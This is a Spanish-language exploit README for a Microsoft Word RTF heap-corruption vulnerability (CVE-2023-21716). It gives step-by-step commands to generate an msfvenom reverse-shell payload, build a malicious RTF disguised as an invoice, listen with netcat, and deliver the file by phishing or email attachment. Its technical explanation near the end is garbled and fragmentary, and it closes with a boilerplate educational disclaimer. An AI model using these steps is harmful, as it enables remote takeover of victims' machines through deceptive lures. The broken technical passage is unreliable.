
CVE-2023-21716 - Exploit de corrupción de montón RCE en fonttbl de RTF de Microsoft Word con payload de shell inversa
Gravedad: Crítica (CVSS 9.8)
Afecta: Microsoft Word 2013 / 2016 / 2019 / 2021 (sin parche)
Parche: Microsoft Patch Tuesday de febrero de 2023
Autor: REGGYRAIDER
CVE-2023-21716 es una vulnerabilidad de corrupción de montón en el analizador RTF de Microsoft Word (wwlib.dll).
Cuando Word analiza una directiva \fonttbl que contiene más de 32 767 entradas de fuente, un contador interno de 16 bits con signo se desborda, corrompiendo los metadatos del montón. Esto permite a un atacante lograr Ejecución Remota de Código simplemente enviando a la víctima un archivo .rtf manipulado.
Sin macros. Sin interacción del usuario más allá de abrir el archivo.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f raw -o payload.bin
git clone https://github.com/REGGYRAIDER/CVE-2023-21716
cd CVE-2023-21716
python3 exploit.py payload.bin invoice_march2024.rtf
nc -lvnp 4444
Cargue vía SMB, archivo adjunto de correo electrónico, o cualquier vector de phishing.
Cuando la víctima abre invoice_march2024.rtf en un Word sin parche, usted recibe una shell reversa.
Attacker creates RTF Word parses \fonttbl Heap corrupted
───────────────────── ──► ────────────────────── ──► ──────────────
\fonttbl with 32769+ Signed 16-bit counter Attacker's
font definitions overflows → 0x8000 shellcode runs
\f<N> dentro de \fonttbl.payload.bin) se coloca dentro de \pict y cae en la región corrupta, obteniendo ejecución cuando el asignador lo procesa.Esta herramienta está destinada únicamente con fines educativos y pruebas de penetración autorizadas.
Utilizar este exploit contra sistemas que no posee o para los que no tiene permiso explícito por escrito para probar es ilegal.
El autor no asume ninguna responsabilidad por el mal uso.